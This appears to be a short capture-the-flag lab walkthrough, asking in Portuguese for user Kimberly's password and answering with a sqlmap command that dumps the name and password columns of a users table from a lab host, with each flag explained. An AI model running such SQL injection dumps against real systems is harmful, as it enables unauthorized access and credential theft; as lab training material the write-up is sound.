Question-2
Qual é a senha do usuário Kimberly? (Caso 1)
Payload :
sqlmap http://94.237.59.129:31261/case1.php\?id\=1 --batch -D testdb --dump -T users -C name,password
--batch
: Runs SQLMap in non-interactive mode.-D testdb
: Specifies the database (testdb
) to target.--dump
: Dumps the contents of the specified database and table.-T users
: Targets theusers
table.-C name,password
: Specifies the columnsname
andpassword
to retrieve from theusers
table.
Last updated